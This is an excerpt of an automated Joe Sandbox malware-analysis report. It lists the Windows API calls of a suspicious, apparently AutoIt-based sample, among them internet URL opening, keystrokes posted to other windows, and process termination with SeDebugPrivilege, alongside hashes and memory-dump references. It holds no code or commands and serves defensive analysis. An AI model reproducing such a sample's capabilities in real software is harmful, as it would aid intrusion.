                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63417E31208611AFD710CF16E888B257BE5EF44358F15C4AAE42AABB72C735EC46CBD0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EDC9D2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EDC9E5
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00EDC9F9
                                                                                                                                                                                                                                        • Part of subcall function 00EDCAA3: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EDCAC2
                                                                                                                                                                                                                                        • Part of subcall function 00EDCAA3: GetLastError.KERNEL32 ref: 00EDCB72
                                                                                                                                                                                                                                        • Part of subcall function 00EDCAA3: SetEvent.KERNEL32(?), ref: 00EDCB86
                                                                                                                                                                                                                                        • Part of subcall function 00EDCAA3: InternetCloseHandle.WININET(00000000), ref: 00EDCB91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 337547030-0
                                                                                                                                                                                                                                      • Opcode ID: d1454b0601a1c2e15ec15534000a9e801e0ebace19ab05a5ff1bd481572c2dea
                                                                                                                                                                                                                                      • Instruction ID: f3c4e75570fa65e89983c90d73d1c4df2fef519600964f705be00cca53b5930f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1454b0601a1c2e15ec15534000a9e801e0ebace19ab05a5ff1bd481572c2dea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA316D7120470AAFDB21DF75CC44ABABBE9FF44384B20551EF956A6610D730E816EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EC40E7
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: GetCurrentThreadId.KERNEL32 ref: 00EC40EE
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EC2C3D), ref: 00EC40F5
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC2C47
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EC2C65
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00EC2C69
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC2C73
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EC2C8B
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00EC2C8F
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC2C99
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EC2CAD
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00EC2CB1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                                                                                      • Opcode ID: e41bbaa353cf54631e0b72bbcf0b09903eeec77e62d820b37dbe65585b8788e9
                                                                                                                                                                                                                                      • Instruction ID: 77282fe723f0f33e4c201a48a58fdf2af7b45f4b2ed7cac7ab8a123e65721755
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e41bbaa353cf54631e0b72bbcf0b09903eeec77e62d820b37dbe65585b8788e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1001D870784210BFFB2067699C8AF697F9ADF89B51F510005F318BF1E0C9E25445CA6B
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00EC1AD3,?,?,00000000), ref: 00EC1E96
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00EC1AD3,?,?,00000000), ref: 00EC1E9D
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC1AD3,?,?,00000000), ref: 00EC1EB2
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00EC1AD3,?,?,00000000), ref: 00EC1EBA
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00EC1AD3,?,?,00000000), ref: 00EC1EBD
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC1AD3,?,?,00000000), ref: 00EC1ECD
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00EC1AD3,00000000,?,00EC1AD3,?,?,00000000), ref: 00EC1ED5
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00EC1AD3,?,?,00000000), ref: 00EC1ED8
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00EC1EFE,00000000,00000000,00000000), ref: 00EC1EF2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                                                      • Opcode ID: 51d0921740e19c692cb5806cb33fed6dae1e2151b76cceb2eaf9a7e74e5888cd
                                                                                                                                                                                                                                      • Instruction ID: 6a029cb002c4e98bb7dcde7ee42f8310b9bb0a5536f089fe6141a82a976c463d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51d0921740e19c692cb5806cb33fed6dae1e2151b76cceb2eaf9a7e74e5888cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E701CDB5245348BFE710AFA6DC4DF6B7FADEB89711F414411FA05EB1A1CA719814CB20
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ECDB92: CreateToolhelp32Snapshot.KERNEL32 ref: 00ECDBB7
                                                                                                                                                                                                                                        • Part of subcall function 00ECDB92: Process32FirstW.KERNEL32(00000000,?), ref: 00ECDBC5
                                                                                                                                                                                                                                        • Part of subcall function 00ECDB92: CloseHandle.KERNEL32(00000000), ref: 00ECDC92
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEA9C6
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EEA9D9
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEAA0C
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEAAC1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00EEAACC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEAB1D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                      • Opcode ID: 7661eb9db40b0aa213f77105446d2d1c9c64301b2818f2e31d42b55e327b89d9
                                                                                                                                                                                                                                      • Instruction ID: e160ef8862e98dbefad944f01770f90d196b017b4a590fb5601f5d5d2466c352
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7661eb9db40b0aa213f77105446d2d1c9c64301b2818f2e31d42b55e327b89d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2619130208241AFD320DF16D994F29BBE1AF44308F1894ACE4666B793D771FC49CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ECC3B3
                                                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 00ECC3D3
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00ECC409
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(0170BAE0), ref: 00ECC45A
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(0170BAE0,?,00000001,00000030), ref: 00ECC482
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                      • String ID: 0$2
                                                                                                                                                                                                                                      • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                      • Opcode ID: b947523e2c44f41cf39c22f6f52ad7b513c8b54bdef762c14fb2faf7c44ca272
                                                                                                                                                                                                                                      • Instruction ID: d0077bce57c3a9fd8859f31ad1cb36df13921ec7be65a35fa6a149c12852f900
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b947523e2c44f41cf39c22f6f52ad7b513c8b54bdef762c14fb2faf7c44ca272
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B51AF705002049BDB28CF68DA94FBEBBE9BF45318F34E15DE429B7290D3729846CB21
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00ECCFC9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                      • Opcode ID: 194bfdde20d69fcdbe65295bf9e86fb44ad1ec7e6290c912a2800406b877ae22
                                                                                                                                                                                                                                      • Instruction ID: 81764fab747cb6d3dd5752c85df628b5106cadd0f5fb169bd73e1d51285e105e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 194bfdde20d69fcdbe65295bf9e86fb44ad1ec7e6290c912a2800406b877ae22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB11D87138D34BBBA7006B15AD82EAAA7DEDF15324B30102EF50CB62C1D6A2A9415261
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00EA2970,00000004,00000000,00000000), ref: 00E7F285
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00EA2970,00000004,00000000,00000000), ref: 00EBF7D6
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00EA2970,00000004,00000000,00000000), ref: 00EBF859
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                                      • Opcode ID: 70da53f9c1099e4874913ee7d2ead347b1ca4e3296546dcfe8af9e51e39cfa16
                                                                                                                                                                                                                                      • Instruction ID: e852a1a878fcfadd66043163093fd3aaf44a8c5bdabb609c0be41739572c5134
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70da53f9c1099e4874913ee7d2ead347b1ca4e3296546dcfe8af9e51e39cfa16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8441F9396082C09ECB39DB29CC887BA3F96AF86328F14E43DE44E76572C571A840DB11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EF3580
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EF3588
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF3593
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EF359F
                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF35DB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF35EC
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF62CC,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF3627
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF3646
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                      • Opcode ID: 77470010897b69a2f7971c7bffd10b35c18a7e236c598074a8dcaed7e7eef9c5
                                                                                                                                                                                                                                      • Instruction ID: c97d9f2a964b49fcd3f6dc11ebac35737e29ec78007278b09184e3921d4ced43
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77470010897b69a2f7971c7bffd10b35c18a7e236c598074a8dcaed7e7eef9c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0316D72205214BFEB118F11CC49FFB3FAAEB89755F044055FE08EA291C6759941CBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                                                      • Opcode ID: 7957b0df04b93db83e0e1a2efb50ad88da1aa043b187a82cf51bf8a10eea1d31
                                                                                                                                                                                                                                      • Instruction ID: 5ff84bb2d6f58105e3461363dddc35f86913cd3610c973d772404c34360ef76e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7957b0df04b93db83e0e1a2efb50ad88da1aa043b187a82cf51bf8a10eea1d31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75D1DF72A0064E9FDB10CF99C881BAEB7B5EF88318F149569E915FB281E770ED41CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                      • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                      • Opcode ID: 0289fa061c9b0f192208bc2cf14447aa3bc5f7eb60044264b1464671d624de71
                                                                                                                                                                                                                                      • Instruction ID: 1fed3e1a0f40e78450d1e3a073c816686e0f91474490c6a72369b134f83f4e2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0289fa061c9b0f192208bc2cf14447aa3bc5f7eb60044264b1464671d624de71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5391BDB1A00259AFCF20CFA6CC44FAEBBB8EF45718F109559F515BB280D7709905CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                                                                                      • Opcode ID: 2adf7dd21790e346528918f3d49fd666b10e03592038033da322d103c23df411
                                                                                                                                                                                                                                      • Instruction ID: d03c9c97de6f7656b36eab1cfb14a0674b8a6410e3032fa234b082ae30d0fd40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2adf7dd21790e346528918f3d49fd666b10e03592038033da322d103c23df411
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90917B71D04219EFCB14CFA9CC88AEEBBB9FF89320F149156E415B7252D774A942CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(0170BA90), ref: 00EF8758
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(0170BA90), ref: 00EF8764
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EF883F
                                                                                                                                                                                                                                      • SendMessageW.USER32(0170BA90,000000B0,?,?), ref: 00EF8872
                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00EF88AA
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(0170BA90,000000EC), ref: 00EF88CC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EF88E4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
